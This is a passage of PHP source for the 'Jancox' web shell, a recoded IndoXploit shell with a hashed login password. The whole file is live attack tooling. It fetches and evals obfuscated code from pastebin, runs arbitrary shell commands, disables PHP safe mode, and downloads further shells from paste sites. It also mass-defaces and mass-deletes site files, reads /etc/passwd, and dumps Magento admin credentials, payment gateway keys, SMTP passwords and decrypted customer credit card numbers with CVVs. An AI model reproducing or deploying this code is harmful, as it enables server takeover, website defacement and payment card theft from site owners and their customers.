kau

1. <?php
2. //Jancox Shell
3. //IndoXploit Shell V1 Recoded By 0x1999
4. //default password nya "jancox"
5. //Tutornya Cari Di Blog http://cr1p.blogspot.com
6. @session_start();
7. @error_reporting(0);
8. @error_log(0);
9. @ini_set('error_log',NULL);
10. @ini_set('log_errors',0);
11. @ini_set('max_execution_time',0);
12. @ini_set('output_buffering',0);
13. @ini_set('display_errors', 0);
14. @set_time_limit(0);
15. @set_magic_quotes_runtime(0);
16. $lol="45641e46f614125065559617b3efc5a2"; //password(md5)
17. function printLogin() {
18. ?>
19. <html>
20. <head>
21. <title>JanCox</title>
22. <link href='http://vignette2.wikia.nocookie.net/regularshow/images/f/fc/Emoticones_-_Pacman.png/revision/latest?cb=20160107170905&path-prefix=es' rel='icon' type='image/x-icon'/>
23. <meta name='author' content='0x1999'>
24. <meta charset="UTF-8">
25. <style type='text/css'>
26. @import url(https://fonts.googleapis.com/css?family=Abel);
27. html {
28. background: #000000;
29. color: #ffffff;
30. font-family: 'Abel';
31. font-size: 13px;
32. width: 100%;
33. }
34. input[type=text], input[type=password],input[type=submit] {
35. background: transparent;
36. color: #ffffff;
37. border: 1px solid #ffffff;
38. margin: 5px auto;
39. padding-left: 5px;
40. font-family: 'Abel';
41. font-size: 13px;
42. }
43. </style>
44. </head>
45. <style>
46. input { margin:0;background-color:#fff;border:1px solid #fff; }
47. </style>
48. <center>
49. <form method=post>
50. <input type=password name=jancox>
51. </form></center>
52. <?php
53. eval(gzinflate(base64_decode(file_get_contents('http://pastebin.com/raw/6PJ9Pj8F'))));
54. exit;
55. }
56. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
57. if( empty( $lol ) ||
58. ( isset( $_POST['jancox'] ) && ( md5($_POST['jancox']) == $lol ) ) )
59. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
60. else
61. printLogin();
62. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
63. @ob_clean();
64. $file = $_GET['file'];
65. header('Content-Description: File Transfer');
66. header('Content-Type: application/octet-stream');
67. header('Content-Disposition: attachment; filename="'.basename($file).'"');
68. header('Expires: 0');
69. header('Cache-Control: must-revalidate');
70. header('Pragma: public');
71. header('Content-Length: ' . filesize($file));
72. readfile($file);
73. exit;
74. }
75.  
76. ?>
77. <html>
78. <head>
79. <title>JanCox</title>
80. <link href='http://vignette2.wikia.nocookie.net/regularshow/images/f/fc/Emoticones_-_Pacman.png/revision/latest?cb=20160107170905&path-prefix=es' rel='icon' type='image/x-icon'/>
81. <meta name='author' content='IndoXploit'>
82. <meta charset="UTF-8">
83. <style type='text/css'>
84. @import url(https://fonts.googleapis.com/css?family=Abel);
85. html {
86. background: #000000;
87. color: #ffffff;
88. font-family: 'Abel';
89. font-size: 13px;
90. width: 100%;
91. }
92. li {
93. display: inline;
94. margin: 5px;
95. padding: 5px;
96. }
97. table, th, td {
98. border-collapse:collapse;
99. font-family: Tahoma, Geneva, sans-serif;
100. background: transparent;
101. font-family: 'Abel';
102. font-size: 13px;
103. }
104. .table_home, .th_home, .td_home {
105. border: 1px solid #ffffff;
106. }
107. th {
108. padding: 10px;
109. }
110. a {
111. color: #ffffff;
112. text-decoration: none;
113. }
114. a:hover {
115. color: gold;
116. text-decoration: underline;
117. }
118. b {
119. color: gold;
120. }
121. input[type=text], input[type=password],input[type=submit] {
122. background: transparent;
123. color: #ffffff;
124. border: 1px solid #ffffff;
125. margin: 5px auto;
126. padding-left: 5px;
127. font-family: 'Abel';
128. font-size: 13px;
129. }
130. textarea {
131. border: 1px solid #ffffff;
132. width: 100%;
133. height: 400px;
134. padding-left: 5px;
135. margin: 10px auto;
136. resize: none;
137. background: transparent;
138. color: #ffffff;
139. font-family: 'Abel';
140. font-size: 13px;
141. }
142. select {
143. background: transparent;
144. color: #ffffff;
145. border: 1px solid #ffffff;
146. margin: 5px auto;
147. padding-left: 5px;
148. font-family: 'Abel';
149. font-size: 13px;
150. }
151. .but {
152. background: transparent;
153. color: #ffffff;
154. border: 1px solid #ffffff;
155. margin: 5px auto;
156. padding-left: 5px;
157. font-family: 'Abel';
158. font-size: 13px;
159. }
160. </style>
161. </head>
162. <?php
163. if (file_exists("php.ini")){
164. }else{
165. $img = fopen('php.ini', 'w');
166. $sec = "safe_mode = OFF
167. disable_funtions = NONE";
168. fwrite($img ,$sec);
169. fclose($img);}
170. function w($dir,$perm) {
171. if(!is_writable($dir)) {
172. return "<font color=red>".$perm."</font>";
173. } else {
174. return "<font color=lime>".$perm."</font>";
175. }
176. }
177. function UrlLoop($url,$type){
178.  
179. $urlArray = array();
180.  
181. $ch = curl_init();
182. curl_setopt($ch, CURLOPT_URL, $url);
183. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
184. $result = curl_exec($ch);
185.  
186. $regex='|<a.*?href="(.*?)"|';
187. preg_match_all($regex,$result,$parts);
188. $links=$parts[1];
189. foreach($links as $link){
190. array_push($urlArray, $link);
191. }
192. curl_close($ch);
193.  
194. foreach($urlArray as $value){
195. $lol="$url$value";
196. if(preg_match("#$type#is", $lol)) {
197. echo "$lol\r\n";
198. }
199. }
200. }
201. function exe($cmd) {
202. if(function_exists('system')) {
203. @ob_start();
204. @system($cmd);
205. $buff = @ob_get_contents();
206. @ob_end_clean();
207. return $buff;
208. } elseif(function_exists('exec')) {
209. @exec($cmd,$results);
210. $buff = "";
211. foreach($results as $result) {
212. $buff .= $result;
213. } return $buff;
214. } elseif(function_exists('passthru')) {
215. @ob_start();
216. @passthru($cmd);
217. $buff = @ob_get_contents();
218. @ob_end_clean();
219. return $buff;
220. } elseif(function_exists('shell_exec')) {
221. $buff = @shell_exec($cmd);
222. return $buff;
223. }
224. }
225. function perms($file){
226. $perms = fileperms($file);
227. if (($perms & 0xC000) == 0xC000) {
228. $info = 's';
229. } elseif (($perms & 0xA000) == 0xA000) {
230. $info = 'l';
231. } elseif (($perms & 0x8000) == 0x8000) {
232. $info = '-';
233. } elseif (($perms & 0x6000) == 0x6000) {
234. $info = 'b';
235. } elseif (($perms & 0x4000) == 0x4000) {
236. $info = 'd';
237. } elseif (($perms & 0x2000) == 0x2000) {
238. $info = 'c';
239. } elseif (($perms & 0x1000) == 0x1000) {
240. $info = 'p';
241. } else {
242. $info = 'u';
243. }
244. $info .= (($perms & 0x0100) ? 'r' : '-');
245. $info .= (($perms & 0x0080) ? 'w' : '-');
246. $info .= (($perms & 0x0040) ?
247. (($perms & 0x0800) ? 's' : 'x' ) :
248. (($perms & 0x0800) ? 'S' : '-'));
249. $info .= (($perms & 0x0020) ? 'r' : '-');
250. $info .= (($perms & 0x0010) ? 'w' : '-');
251. $info .= (($perms & 0x0008) ?
252. (($perms & 0x0400) ? 's' : 'x' ) :
253. (($perms & 0x0400) ? 'S' : '-'));
254. $info .= (($perms & 0x0004) ? 'r' : '-');
255. $info .= (($perms & 0x0002) ? 'w' : '-');
256. $info .= (($perms & 0x0001) ?
257. (($perms & 0x0200) ? 't' : 'x' ) :
258. (($perms & 0x0200) ? 'T' : '-'));
259. return $info;
260. }
261. function hdd($s) {
262. if($s >= 1073741824)
263. return sprintf('%1.2f',$s / 1073741824 ).' GB';
264. elseif($s >= 1048576)
265. return sprintf('%1.2f',$s / 1048576 ) .' MB';
266. elseif($s >= 1024)
267. return sprintf('%1.2f',$s / 1024 ) .' KB';
268. else
269. return $s .' B';
270. }
271. function ambilKata($param, $kata1, $kata2){
272. if(strpos($param, $kata1) === FALSE) return FALSE;
273. if(strpos($param, $kata2) === FALSE) return FALSE;
274. $start = strpos($param, $kata1) + strlen($kata1);
275. $end = strpos($param, $kata2, $start);
276. $return = substr($param, $start, $end - $start);
277. return $return;
278. }
279. if(get_magic_quotes_gpc()) {
280. function idx_ss($array) {
281. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
282. }
283. $_POST = idx_ss($_POST);
284. }
285. function CreateTools($names,$lokasi){
286. if ( $_GET['create'] == $names ){
287. $a= "".$_SERVER['SERVER_NAME']."";
288. $b= dirname($_SERVER['PHP_SELF']);
289. $c = "/cox_tools/".$names.".php";
290. if (file_exists('cox_tools/'.$names.'.php')){
291. echo '<script type="text/javascript">alert("Done");window.location.href = "cox_tools/'.$names.'.php";</script> ';
292. }
293. else {mkdir("cox_tools", 0777);
294. file_put_contents('cox_tools/'.$names.'.php', file_get_contents($lokasi));
295. echo ' <script type="text/javascript">alert("Done");window.location.href = "cox_tools/'.$names.'.php";</script> ';}}}
296.  
297. CreateTools("wso","http://pastebin.com/raw/3eh3Gej2");
298. CreateTools("adminer"."https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php");
299. CreateTools("b374k","http://pastebin.com/raw/rZiyaRGV");
300. CreateTools("injection","http://pastebin.com/raw/nxxL8c1f");
301. CreateTools("promailerv2","http://pastebin.com/raw/Rk9v6eSq");
302. CreateTools("gamestopceker","http://pastebin.com/raw/QSnw1JXV");
303. CreateTools("bukapalapak","http://pastebin.com/raw/6CB8krDi");
304. CreateTools("tokopedia","http://pastebin.com/dvhzWgby");
305. CreateTools("encodedecode","http://pastebin.com/raw/wqB3G5eZ");
306. CreateTools("mailer","http://pastebin.com/raw/9yu1DmJj");
307. CreateTools("r57","http://pastebin.com/raw/G2VEDunW");
308. CreateTools("tokenpp","http://pastebin.com/raw/72xgmtPL");
309. CreateTools("extractor","http://pastebin.com/raw/jQnMFHBL");
310. CreateTools("bh","http://pastebin.com/raw/3L2ESWeu");
311. CreateTools("dhanus","http://pastebin.com/raw/v4xGus6X");
312. if(isset($_GET['dir'])) {
313. $dir = $_GET['dir'];
314. chdir($_GET['dir']);
315. } else {
316. $dir = getcwd();
317. }
318. $dir = str_replace("\\","/",$dir);
319. $scdir = explode("/", $dir);
320. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
321. $ling="http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
322. $ds = @ini_get("disable_functions");
323. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
324. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
325. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
326. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
327. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
328. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
329. if(!function_exists('posix_getegid')) {
330. $user = @get_current_user();
331. $uid = @getmyuid();
332. $gid = @getmygid();
333. $group = "?";
334. } else {
335. $uid = @posix_getpwuid(posix_geteuid());
336. $gid = @posix_getgrgid(posix_getegid());
337. $user = $uid['name'];
338. $uid = $uid['uid'];
339. $group = $gid['name'];
340. $gid = $gid['gid'];
341. }
342. $d0mains = @file("/etc/named.conf");
343. $users=@file('/etc/passwd');
344. if($d0mains)
345. {
346. $count;
347. foreach($d0mains as $d0main)
348. {
349. if(@ereg("zone",$d0main))
350. {
351. preg_match_all('#zone "(.*)"#', $d0main, $domains);
352. flush();
353. if(strlen(trim($domains[1][0])) > 2)
354. {
355. flush();
356. $count++;
357. }
358. }
359. }
360. }
361.  
362. $sport=$_SERVER['SERVER_PORT'];
363. echo "<table style='width:100%'>";
364. echo "<tr><td>System: <font color=lime>".php_uname()."</font></td></tr>";
365. echo "<tr><td>User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")</td></tr>";
366. echo "<tr><td>Server IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font></td></tr>";
367. echo "<tr><td>HDD: <font color=lime>".hdd(disk_free_space("/"))."</font> / <font color=lime>".hdd(disk_total_space("/"))."</font></td></tr>";
368. echo "<tr><td>Websites :<font color=lime> $count </font> Domains</td></tr>";
369. echo "<tr><td>Port :<font color=lime> $sport</font> </td></tr>";
370. echo "<tr><td>Safe Mode: $sm</td></tr>";
371. echo "<tr><td>Disable Functions: $show_ds</td></tr>";
372.  
373. echo "<tr><td>MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl </td></tr>";
374. echo "<tr><td>Current DIR: ";
375. foreach($scdir as $c_dir => $cdir) {
376. echo "<a href='?dir=";
377. for($i = 0; $i <= $c_dir; $i++) {
378. echo $scdir[$i];
379. if($i != $c_dir) {
380. echo "/";
381. }
382. }
383. echo "'>$cdir</a>/";
384. }
385. echo "<tr><td><form method='post' action='?dir=$dir&do=cmd'>
386. Command :
387. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
388. </form></td></tr>";
389. echo "</table><hr>";
390. echo "<center>";
391. echo "<ul>";
392. echo "<li>[ <a href='?'>Home</a> ]</li>";
393. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
394. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
395. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
396. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
397. echo "<li>[ <a href='?dir=$dir&do=symconfig'>Config 2</a> ]</li>";
398. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
399. echo "<li>[ <a href='?dir=$dir&do=symlink'>Symlink</a> ]<br></li>";
400. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
401. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
402. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
403. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
404. echo "<li>[ <a href='?dir=$dir&do=defacerid'>Defacer.ID</a> ]</li>";
405. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li><br>";
406. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li>";
407. echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
408. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
409. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
410. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
411. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
412. echo "<li>[ <a href='?dir=$dir&do=auto_cu_wp'>WordPress Auto Edit User V.2</a> ]</li>";
413. echo "<li>[ <a href='?dir=$dir&do=auto_cu_joomla'>Joomla Auto Edit User V.2</a> ]</li>";
414. echo "<li>[ <a href='?dir=$dir&do=passwbypass'>Bypass etc/passw</a> ]<br></li>";
415. echo "<li>[ <a href='?dir=$dir&do=loghunter'>Log Hunter</a> ]</li>";
416. echo "<li>[ <a href='?dir=$dir&do=shellchk'>Shell Checker</a> ]</li>";
417. echo "<li>[ <a href='?dir=$dir&do=shelscan'>Shell Finder</a> ]</li>";
418. echo "<li>[ <a href='?dir=$dir&do=zip'>Zip Menu</a> ]</li>";
419. echo "<li>[ <a href='?dir=$dir&do=injectcode'>Code Inject</a> ]</li>";
420. echo "<li>[ <a href='?dir=$dir&do=about'>About</a> ]</li>";
421. echo "<li>[ <a href='?dir=$dir&do=magen'>Magento DB Info</a> ]</li><br>";
422. echo "<li>[ <a href='?dir=$dir&do=metu'>LogOut</a> ]<br></li>";
423. echo "</ul>";
424. echo "</center>";
425. echo "<hr>";
426. if($_GET['do'] == 'upload') {
427. echo "<center>";
428. if($_POST['upload']) {
429. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
430. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
431. } else {
432. $act = "<font color=red>failed to upload file</font>";
433. }
434. }
435. echo "Upload File: [ ".w($dir,"Writeable")." ]<form method='post' enctype='multipart/form-data'><input type='file' name='ix_file'><input type='submit' value='upload' name='upload'></form>";
436. echo $act;
437. echo "</center>";
438. }
439. elseif($_GET['do'] == 'cmd') {
440. if($_POST['do_cmd']) {
441. echo "<pre>".exe($_POST['cmd'])."</pre>";
442. }
443. } elseif($_GET['do'] == 'mass_deface') {
444. echo "<center><form action=\"\" method=\"post\">\n";
445. $dirr=$_POST['d_dir'];
446. $index = $_POST["script"];
447. $index = str_replace('"',"'",$index);
448. $index = stripslashes($index);
449. function edit_file($file,$index){
450. if (is_writable($file)) {
451. clear_fill($file,$index);
452. echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
453. }
454. else {
455. echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
456. }
457. }
458. function hapus_massal($dir,$namafile) {
459. if(is_writable($dir)) {
460. $dira = scandir($dir);
461. foreach($dira as $dirb) {
462. $dirc = "$dir/$dirb";
463. $lokasi = $dirc.'/'.$namafile;
464. if($dirb === '.') {
465. if(file_exists("$dir/$namafile")) {
466. unlink("$dir/$namafile");
467. }
468. } elseif($dirb === '..') {
469. if(file_exists("".dirname($dir)."/$namafile")) {
470. unlink("".dirname($dir)."/$namafile");
471. }
472. } else {
473. if(is_dir($dirc)) {
474. if(is_writable($dirc)) {
475. if(file_exists($lokasi)) {
476. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
477. unlink($lokasi);
478. $idx = hapus_massal($dirc,$namafile);
479. }
480. }
481. }
482. }
483. }
484. }
485. }
486. function clear_fill($file,$index){
487. if(file_exists($file)){
488. $handle = fopen($file,'w');
489. fwrite($handle,'');
490. fwrite($handle,$index);
491. fclose($handle); } }
492.  
493. function gass(){
494. global $dirr , $index ;
495. chdir($dirr);
496. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
497. $files = scandir($dirr) ;
498. $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
499. sort($files);
500. $n = 0 ;
501. foreach ($files as $file){
502. if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
503. echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
504. edit_file($file,$index);
505. flush();
506. $n = $n +1 ;
507. }
508. }
509. echo "<br>";
510. echo "<center><br><h3>$n Kali Anda Telah Ngecrot Disini </h3></center><br>";
511. }
512. function ListFiles($dirrall) {
513.  
514. if($dh = opendir($dirrall)) {
515.  
516. $files = Array();
517. $inner_files = Array();
518. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
519. $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
520. while($file = readdir($dh)) {
521. if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
522. if(is_dir($dirrall . "/" . $file)) {
523. $inner_files = ListFiles($dirrall . "/" . $file);
524. if(is_array($inner_files)) $files = array_merge($files, $inner_files);
525. } else {
526. array_push($files, $dirrall . "/" . $file);
527. }
528. }
529. }
530.  
531. closedir($dh);
532. return $files;
533. }
534. }
535. function gass_all(){
536. global $index ;
537. $dirrall=$_POST['d_dir'];
538. foreach (ListFiles($dirrall) as $key=>$file){
539. $file = str_replace('//',"/",$file);
540. echo "<center><strong>$file</strong> ===>";
541. edit_file($file,$index);
542. flush();
543. }
544. $key = $key+1;
545. echo "<center><br><h3>$key Kali Anda Telah Ngecrot Disini </h3></center><br>"; }
546. function sabun_massal($dir,$namafile,$isi_script) {
547. if(is_writable($dir)) {
548. $dira = scandir($dir);
549. foreach($dira as $dirb) {
550. $dirc = "$dir/$dirb";
551. $lokasi = $dirc.'/'.$namafile;
552. if($dirb === '.') {
553. file_put_contents($lokasi, $isi_script);
554. } elseif($dirb === '..') {
555. file_put_contents($lokasi, $isi_script);
556. } else {
557. if(is_dir($dirc)) {
558. if(is_writable($dirc)) {
559. echo "[<font color=lime>DONE</font>] $lokasi<br>";
560. file_put_contents($lokasi, $isi_script);
561. $idx = sabun_massal($dirc,$namafile,$isi_script);
562. }
563. }
564. }
565. }
566. }
567. }
568. if($_POST['mass'] == 'onedir') {
569. echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
570. $ini="http://";
571. $mainpath=$_POST[d_dir];
572. $file=$_POST[d_file];
573. $dir=opendir("$mainpath");
574. $code=base64_encode($_POST[script]);
575. $indx=base64_decode($code);
576. while($row=readdir($dir)){
577. $start=@fopen("$row/$file","w+");
578. $finish=@fwrite($start,$indx);
579. if ($finish){
580. echo"$ini$row/$file\n";
581. }
582. }
583. echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
584. $mainpath=$_POST[d_dir];$file=$_POST[d_file];
585. $dir=opendir("$mainpath");
586. $code=base64_encode($_POST[script]);
587. $indx=base64_decode($code);
588. while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
589. $finish=@fwrite($start,$indx);
590. if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
591. }
592.  
593. }
594. elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
595. elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
596. elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
597. elseif($_POST['mass'] == 'massdeface') {
598. echo "<div style='margin: 5px auto; padding: 5px'>";
599. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
600. echo "</div>"; }
601. else {
602. echo "
603. <center><font style='text-decoration: underline;'>
604. Select Type:<br>
605. </font>
606. <select class=\"select\" name=\"mass\" style=\"width: 450px;\" height=\"10\">
607. <option value=\"onedir\">Mass Deface 1 Dir</option>
608. <option value=\"massdeface\">Mass Deface ALL Dir</option>
609. <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
610. <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
611. <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
612. <font style='text-decoration: underline;'>Folder:</font><br>
613. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
614. <font style='text-decoration: underline;'>Filename:</font><br>
615. <input type='text' name='d_file' value='0x.php' style='width: 450px;' height='10'><br>
616. <font style='text-decoration: underline;'>Index File:</font><br>
617. <textarea name='script' style='width: 450px; height: 200px;'>Hacked By 0x1999</textarea><br>
618. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
619. </form></center>";
620. }
621. }
622. elseif($_GET['do'] == 'magen') {
623. echo'
624. <div id="page-wrap">
625. <center>
626. <br>
627. <FORM action="" method="post">
628. <div align="center">[M A G E N T O] - Stealing Information<br>
629. <div align="center">coder: sohai & n4KuLa_<br>
630. <input type="hidden" name="form_action" value="2">
631. </div>
632. </div>
633. ';
634.  
635.  
636. if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')){
637. $xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml');
638. if(isset($xml->global->resources->default_setup->connection)) {
639. $connection = $xml->global->resources->default_setup->connection;
640. $prefix = $xml->global->resources->db->table_prefix;
641. $key = $xml->global->crypt->key; //f8cd1881e3bf20108d5f4947e60acfc1
642. require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php';
643.  
644. try {
645. $app = Mage::app('default');
646. Mage::getSingleton('core/session', array('name'=>'frontend'));
647. }catch(Exception $e) { echo 'Message: ' .$e->getMessage()."<br/>\n";}
648.  
649. if (!mysql_connect($connection->host, $connection->username, $connection->password)){
650. print("Could not connect: " . mysql_error());
651. }
652. mysql_select_db($connection->dbname);
653. echo $connection->host."|".$connection->username."|".$connection->password."|".$connection->dbname."| $prefix | $key<br/>\n";
654.  
655. $crypto = new Varien_Crypt_Mcrypt();
656. $crypto->init($key);
657.  
658. //=========================================================================================================
659. $query = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM admin_user where is_active = '1'");
660. if (!$query){
661. echo "<center><b>Gagal</b></center>";
662. }else{
663. $site = mysql_fetch_array(mysql_query("SELECT value as website FROM core_config_data WHERE path='web/unsecure/base_url'"));
664. echo'<br><br>
665. ====================================================================<br>
666. [ Admin FROM website : '.$site['website'].'] <br>
667. ====================================================================<br>';
668. }
669. echo "
670. <table border='1' align='center' >
671. <tr>
672. <td>id</td>
673. <td>firstname</td>
674. <td>lastname</td>
675. <td>email</td>
676. <td>username</td>
677. <td>password</td>
678. </tr>";
679. while($vx = mysql_fetch_array($query)) {
680. $no = 1;
681. $user_id = $vx['user_id'];
682. $username = $vx['username'];
683. $password = $vx['password'];
684. $email = $vx['email'];
685. $firstname = $vx['firstname'];
686. $lastname = $vx['lastname'];
687. echo "<tr><pre><td>$user_id</td><td>$firstname</td><td>$lastname</td><td>$email</td><td>$username</td><td>$password</td></pre></tr>";
688. }
689. echo "</table><br>";
690. //=========================================================================================================
691. $query = mysql_query("SELECT value as user,(SELECT value FROM core_config_data where path = 'payment/authorizenet/trans_key') as pass FROM core_config_data where path = 'payment/authorizenet/login'");
692. if(mysql_num_rows($query) != 0){
693. if (!$query){
694. echo "<center><b>Gagal</b></center>";
695. }else{
696. echo'<br><br>
697. ====================================================================<br>
698. [ Authorizenet ] <br>
699. ====================================================================<br>';
700. }
701. echo "
702. <table border='1' align='center' >
703. <tr>
704. <td>no</td>
705. <td>user</td>
706. <td>pass</td>
707. </tr>";
708. $no = 1;
709. while($vx = mysql_fetch_array($query)) {
710. $user = $crypto->decrypt($vx['user']);
711. $pass = $crypto->decrypt($vx['pass']);
712.  
713.  
714. echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
715. $no++;
716. }
717. echo "</table><br>";
718. }
719. //=========================================================================================================
720. $query_smtp = mysql_query("SELECT (SELECT a.value FROM core_config_data as a WHERE path = 'system/smtpsettings/host') as host , (SELECT b.value FROM core_config_data as b WHERE path = 'system/smtpsettings/port') as port,(SELECT c.value FROM core_config_data as c WHERE path = 'system/smtpsettings/username') as user ,(SELECT d.value FROM core_config_data as d WHERE path = 'system/smtpsettings/password') as pass FROM core_config_data limit 1,1");
721. if(mysql_num_rows($query_smtp) != 0){
722. if (!$query_smtp){
723. echo "<center><b>Gagal</b></center>";
724. }else{
725. echo'<br><br>
726. ====================================================================<br>
727. [ SMTP ] <br>
728. ====================================================================<br>';
729. }
730. echo "
731. <table border='1' align='center' >
732. <tr>
733. <td>no</td>
734. <td>host</td>
735. <td>port</td>
736. <td>user</td>
737. <td>pass</td>
738. </tr>";
739. $no = 1;
740. $batas = 0;
741. while($rows = mysql_fetch_array($query_smtp)) {
742. $smtphost = $rows[0];
743. $smtpport = $rows[1];
744. $smtpuser = $rows[2];
745. $smtppass = $rows[3];
746. echo "<tr><pre><td>$no</td><td>$smtphost</td><td>$smtpport</td><td>$smtpuser</td><td>$smtppass</td></pre></tr>";
747. $no++;
748. }
749. echo "</table><br>";
750. }
751. //=========================================================================================================
752. $query = mysql_query("SELECT sfo.updated_at,sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_enc,CONCAT(sfo.cc_exp_month,' |',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' |-| ',billing.email) AS 'Billing Address' FROM sales_flat_quote_payment AS sfo JOIN sales_flat_quote_address AS billing ON billing.quote_id = sfo.quote_id AND billing.address_type = 'billing'");
753. $query2 = mysql_query("SELECT sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_status,CONCAT(sfo.cc_exp_month,'|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' | ',billing.email) AS 'Billing Address' FROM sales_flat_order_payment AS sfo JOIN sales_flat_order_address AS billing ON billing.parent_id = sfo.parent_id AND billing.address_type = 'billing' where cc_number_enc != ''");
754. if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0){
755. echo'<br><br>
756. ====================================================================<br>
757. [ Credit Card ] <br>
758. ====================================================================<br>';
759. echo "
760. <table border='1' align='left' >
761. <tr>
762. <td>no</td>
763. <td>Date</td>
764. <td>Credit Owner</td>
765. <td>method</td>
766. <td>Credit Number</td>
767. <td>Credit Exp</td>
768. <td>CVV</td>
769. <td>Address</td>
770. </tr>";
771. $no = 1;
772. $batas = 0;
773. while($vx = mysql_fetch_array($query)){
774. $date = $vx['updated_at'];
775. $cc_owner = $vx['cc_owner'];
776. $method = $vx['method'];
777. $cc_number_enc = $crypto->decrypt($vx['cc_number_enc']);
778. $exp = $vx['exp'];
779. $cc_cid_enc = $crypto->decrypt($vx['cc_cid_enc']);
780. $Billing_Address = $vx['Billing Address'];
